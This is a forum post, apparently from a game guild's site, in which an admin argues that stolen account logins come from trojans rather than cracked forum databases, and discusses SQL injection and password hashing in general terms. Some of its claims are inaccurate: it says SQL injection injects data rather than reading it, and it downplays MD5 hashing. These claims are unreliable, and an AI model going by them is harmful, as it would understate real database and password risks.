It's interesting, but the conclusion is wrong.
Killemal wrote:Interesting comment about where stolen info is coming from; Guild Forums. Not to nock our beautiful and wise forum and site admins, but for safety's sake, you may want to change your forum contact e-mail address and forum password to ones NOT matching your Battle.net login. If someone were to crack our PhP DB and steal your forum login info they could use that to guess your Battle.net login credentials and in turn loot your drood.
I read the Symantec article yesterday which concludes that the actual source is a trojan, not guild forums. You're deriving your conclusion from a comment on the site that is neither formally verified nor presented alongside any proof. The dude can't even spell "phpBB" for one and is totally talking out of his ass. Here's the pertinent bit about what he said along with my rational for claiming he's an idiot:
Find a popular guild, track down their website, and if they're using an old version of phpHB or whatever, it's a pretty simple script-kiddie process to crack those and get a nice big table that has all the e-mail/password combos. Fire up WoW and start punching them in until you've got a winner.
This bit largely depends on finding an SQL injection vulnerability in the host software. Don't get me wrong, phpBB has a LOT of those, but as the years have gone by many of them have been plugged. Turus and I have taken pretty extensive precautions to attempt to limit the likelihood of these existing. Furthermore, it's also important to understand that an SQL injection vulnerability often doesn't necessarily mean the attacker has control of the database (they can't get your e-mail), and in fact, here's the problem with that commenter's reasoning:
First, virtually EVERY attack I have seen that targets sites even with SQL injection vulnerabilities VERY rarely accomplishes gaining complete access to the associated tables. SQL injection is called "injection" precisely because of that--they use the vulnerability to
inject data, not read it. Second, gaining access to someone's e-mail means absolutely nothing--you still have to get the password.
And the third bombshell that points out that the poster
knows absolutely nothing is that the
passwords are all hashed, typically using MD5. Most forum software these days uses a hash + salt to increase entropy in the password. There are ways, of course, to attack hashes, but it's going to be a fairly lengthy process unless they use rainbow tables (which have their limitations as well and don't work as well with SHA1/SHA256).
Let me repeat: PASSWORDS ARE NOT STORED IN PLAIN TEXT. THEY ARE NOT READABLE.Now, that's not to say this isn't a concern. SQL injection is a problem, because it's feasible (and I've seen this many times with vBulletin-based boards) that attackers can inject script code into templates for certain message boards (not phpBB because it doesn't store templates in the database) that inject JavaScript that usually attempts to load up (in the background, possibly in an iframe) a site that contains an infected Flash movie or some such that actually installs the trojan--or some are even more clever and use vulnerabilities in MSIE.
In other words, the forum software acts only as an intermediary, if it's compromised. The user accounts are harvested by way of trojan, installed on the user's system. It's exactly the same method that accounts have been compromised before, just that the target is vulnerable message board software. And for the record, the software I've seen thusfar with the most widespread vulnerability has been vBulletin 3.8.x. I've seen this particular method in the wild on a number of sites, and it's an attack that is easily automated. phpBB's design, being rather primitive, isn't necessarily susceptible to this. It is susceptible to other things, but as I've mentioned--Turus applied a number of patches and updates, and I've made some personal modifications to the source to try limiting this.
Killemal wrote:Thal and Turus: Feel free to add this info to the scammers stickied post if you see fit
It's an interesting article, but the comments on the source link represent a real knee-jerk reaction to forum security. I'm not going to add this since I think it would do more to scare people away from the forums than it would to actually protect them and their accounts. And we know that the forums are sorely lacking in terms of guild visitors.
